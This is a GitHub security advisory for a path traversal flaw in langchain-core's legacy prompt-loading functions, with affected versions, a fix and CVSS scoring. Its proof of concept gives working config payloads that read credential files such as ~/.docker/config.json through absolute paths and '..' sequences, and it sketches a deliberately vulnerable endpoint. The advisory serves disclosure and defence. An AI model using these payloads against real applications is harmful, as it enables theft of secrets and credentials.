
LangChain Core has Path Traversal vulnerabilities in legacy `load_prompt` functions

High severity • GitHub Reviewed • Published Mar 26, 2026 in langchain-ai/langchain • Updated Mar 27, 2026

Package

pip langchain-core (pip)

Affected versions

< 1.2.22

Patched versions

1.2.22

Description

Summary

Multiple functions in langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples).

Note: The affected functions (load_prompt, load_prompt_from_config, and the .save() method on prompt classes) are undocumented legacy APIs. They are superseded by the dumpd/dumps/load/loads serialization APIs in langchain_core.load, which do not perform filesystem reads and use an allowlist-based security model. As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.

Affected component

Package: langchain-core
File: langchain_core/prompts/loading.py
Affected functions: _load_template(), _load_examples(), _load_few_shot_prompt()

Severity

High

The score reflects the file-extension constraints that limit which files can be read.

Vulnerable code paths

Config key                                Loaded by                Readable extensions
template_path, suffix_path, prefix_path   _load_template()         .txt
examples (when a string)                  _load_examples()         .json, .yaml, .yml
example_prompt_path                       _load_few_shot_prompt()  .json, .yaml, .yml

None of these code paths validated the supplied path against absolute path injection or .. traversal sequences before reading from disk.
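
A simplified sketch of the pre-fix pattern (illustrative only; not the verbatim library source):

from pathlib import Path

def _load_template(var_name: str, config: dict) -> dict:
    # Sketch: resolve a "<var>_path" key to the file's contents.
    if f"{var_name}_path" in config:
        template_path = Path(config.pop(f"{var_name}_path"))
        if template_path.suffix != ".txt":
            raise ValueError("Expected a .txt template file")
        # Only the extension is checked; absolute paths and ".."
        # components reach the read unchanged.
        config[var_name] = template_path.read_text()
    return config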

Impact

An attacker who controls or influences the prompt configuration dict can read files outside the intended directory:

  • .txt files: cloud-mounted secrets (/mnt/secrets/api_key.txt), requirements.txt, internal system prompts
  • .json/.yaml files: cloud credentials (~/.docker/config.json, ~/.azure/accessTokens.json), Kubernetes manifests, CI/CD configs, application settings

This is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose load_prompt_from_config().
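
For illustration only, an exposed wrapper might look like the following (the service and endpoint are hypothetical, using FastAPI purely as an example framework):

from fastapi import FastAPI
from langchain_core.prompts.loading import load_prompt_from_config

app = FastAPI()

@app.post("/prompts/render")
def render_prompt(config: dict):
    # Attacker-supplied JSON flows directly into the loader, turning
    # this endpoint into an arbitrary file-read primitive.
    prompt = load_prompt_from_config(config)
    return {"template": getattr(prompt, "template", None)}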

Proof of concept

from langchain_core.prompts.loading import load_prompt_from_config

# Reads /tmp/secret.txt via absolute path injection
config = {
    "_type": "prompt",
    "template_path": "/tmp/secret.txt",
    "input_variables": [],
}
prompt = load_prompt_from_config(config)
print(prompt.template)  # file contents disclosed

# Reads ../../etc/secret.txt via directory traversal
config = {
    "_type": "prompt",
    "template_path": "../../etc/secret.txt",
    "input_variables": [],
}
prompt = load_prompt_from_config(config)

# Reads arbitrary .json via few-shot examples
config = {
    "_type": "few_shot",
    "examples": "../../../../.docker/config.json",
    "example_prompt": {
        "_type": "prompt",
        "input_variables": ["input", "output"],
        "template": "{input}: {output}",
    },
    "prefix": "",
    "suffix": "{query}",
    "input_variables": ["query"],
}
prompt = load_prompt_from_config(config)

Mitigation

Update langchain-core to >= 1.2.22.

The fix adds path validation that rejects absolute paths and .. traversal sequences by default. An allow_dangerous_paths=True keyword argument is available on load_prompt() and load_prompt_from_config() for trusted inputs.
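
A minimal sketch of that style of validation, assuming the semantics described above (illustrative, not the verbatim patch):

from pathlib import Path

def _is_safe_path(path: str) -> bool:
    # Reject absolute paths and any ".." traversal component,
    # mirroring the checks the fix applies by default.
    p = Path(path)
    return not p.is_absolute() and ".." not in p.parts

For configs that are fully trusted, the escape hatch named above applies:

prompt = load_prompt_from_config(config, allow_dangerous_paths=True)  # trusted input only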

As described above, these legacy APIs have been formally deprecated. Users should migrate to dumpd/dumps/load/loads from langchain_core.load.
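
For example, a prompt can be round-tripped through the supported serialization APIs with no filesystem reads involved (a minimal sketch using public langchain_core APIs):

from langchain_core.load import dumpd, load
from langchain_core.prompts import PromptTemplate

prompt = PromptTemplate.from_template("Summarize {topic} in one sentence.")
serialized = dumpd(prompt)   # plain, JSON-serializable dict; no file paths
restored = load(serialized)  # reconstructed against an import allowlist
assert restored.format(topic="LangChain") == prompt.format(topic="LangChain")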



CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
7.5 / 10

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
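
For reference, the 7.5 overall score follows from this vector under the published CVSS v3.1 formula (a quick check in Python):

import math

# Metric weights from the CVSS v3.1 specification for this vector.
exploitability = 8.22 * 0.85 * 0.77 * 0.85 * 0.85  # AV:N, AC:L, PR:N, UI:N
iss = 1 - (1 - 0.56) * (1 - 0.0) * (1 - 0.0)       # C:H, I:N, A:N
impact = 6.42 * iss                                # scope unchanged
base = math.ceil(min(impact + exploitability, 10.0) * 10) / 10
print(base)  # 7.5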


Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

CVE ID

CVE-2026-34070

GHSA ID

GHSA-qh6h-p6c9-ff54
